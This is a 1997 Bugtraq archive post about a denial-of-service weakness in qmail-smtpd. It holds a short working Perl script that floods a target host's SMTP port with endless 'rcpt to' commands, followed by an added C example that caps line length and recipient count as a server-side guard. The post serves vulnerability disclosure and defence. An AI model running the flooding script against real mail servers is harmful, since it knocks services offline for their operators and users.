Bugtraq mailing list archives
Re: Denial of service (qmail-smtpd)
From: super () UFO ORG (super () UFO ORG)
Date: Thu, 12 Jun 1997 07:04:01 -0700
Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT)
From: Wietse Venema <wietse () wzv win tue nl>
To: djb-qmail () koobera math uic edu
Subject: Denial of service (qmail-smtpd)

While implementing my own mailer, I went over the qmail source code and noticed that qmail is susceptible to a very trivial denial of service attack. By sending SMTP commands of unlimited length, an attacker can make the machine run out of memory, thus rendering it completely unusable.

Below is a little program that demonstrates the problem. When I wrote this I was in C mode; it could probably be done with a much smaller PERL program.

You're right, it could.

------------------------------ qmail.pl ------------------------------
#!/usr/local/bin/perl -w
# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
require 5.002;
use strict;
use Socket;

if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}

my $port = 25;
my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);

socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
send(SKT,"mail from: <me\@me>\n",0) || die "send() $!";
my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n";
print("Attacking..","\n");
while(<SKT>){
    send(SKT,$infstr,0) || die "send() $!";
}
die "Connection lost!";
------------------------------ qmail.pl ------------------------------

.--------------------------------.
|       super () innu org        |
|--------------------------------|
| http://www.ce.net/users/super/ |
|   Fight SPAM! www.cauce.org    |
|             S@IRC              |
`--------------------------------'
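
The server-side counterpart to the two behaviours raised in this thread (commands of unlimited length, and RCPT TO repeated without end), as an added example that is not part of the original posts and is not qmail code. The names `smtp_guard` and `guard_feed` are hypothetical, and the caps of 512 octets per command line and 100 recipients per transaction are assumptions chosen for the example.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_CMD_LINE 512  /* assumed cap: SMTP command line, CRLF included */
#define MAX_RCPTS    100  /* assumed cap: recipients per mail transaction */
enum verdict { V_OK, V_LINE_TOO_LONG, V_TOO_MANY_RCPTS };
struct smtp_guard {
    char     line[MAX_CMD_LINE]; /* fixed buffer: never grows with input */
    size_t   len;                /* bytes stored for the current line */
    int      overflow;           /* line passed the cap; discard up to LF */
    unsigned rcpts;              /* RCPT commands accepted so far */
};

/* Feed raw socket bytes; returns the first violation found, else V_OK. */
enum verdict guard_feed(struct smtp_guard *g, const char *buf, size_t n)
{
    enum verdict first = V_OK;
    for (size_t i = 0; i < n; i++) {
        if (buf[i] != '\n') {
            if (g->len < MAX_CMD_LINE - 1) g->line[g->len++] = buf[i];
            else g->overflow = 1;  /* drop the byte instead of allocating */
            continue;
        }
        g->line[g->len] = '\0';
        enum verdict v = V_OK;
        if (g->overflow) v = V_LINE_TOO_LONG;
        else if (strncasecmp(g->line, "RCPT TO:", 8) == 0) {
            if (g->rcpts >= MAX_RCPTS) v = V_TOO_MANY_RCPTS;
            else g->rcpts++;
        } else if (strncasecmp(g->line, "MAIL FROM:", 10) == 0 ||
                   strncasecmp(g->line, "RSET", 4) == 0)
            g->rcpts = 0;          /* new transaction: reset the counter */
        if (first == V_OK) first = v;
        g->len = 0; g->overflow = 0;
    }
    return first;
}

int main(void)
{
    /* Constructed input: RCPT TO repeated until the guard objects. */
    const char *rcpt = "rcpt to: <me@example.test>\n";
    struct smtp_guard g = {0};
    enum verdict v = V_OK;
    while (v == V_OK) v = guard_feed(&g, rcpt, strlen(rcpt));
    printf("verdict=%d, recipients accepted=%u\n", v, g.rcpts);
    return 0;
}
```

On a violation the caller would send an error reply or close the connection; a read timeout is still needed for a peer that never sends a line terminator.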